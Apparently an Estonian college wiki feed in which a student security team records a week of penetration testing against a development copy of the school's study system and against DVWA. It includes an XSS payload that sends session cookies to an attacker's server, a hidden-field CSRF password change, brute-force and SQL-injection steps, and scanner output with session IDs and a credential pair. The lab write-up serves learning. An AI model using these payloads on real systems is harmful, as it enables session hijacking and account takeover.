Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47048</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47048"/>
		<updated>2012-03-30T13:46:36Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:&amp;quot;Insecure Cryptographic Storage.pdf&amp;quot;]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:&amp;quot;Security Misconfiguration.pdf&amp;quot;]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
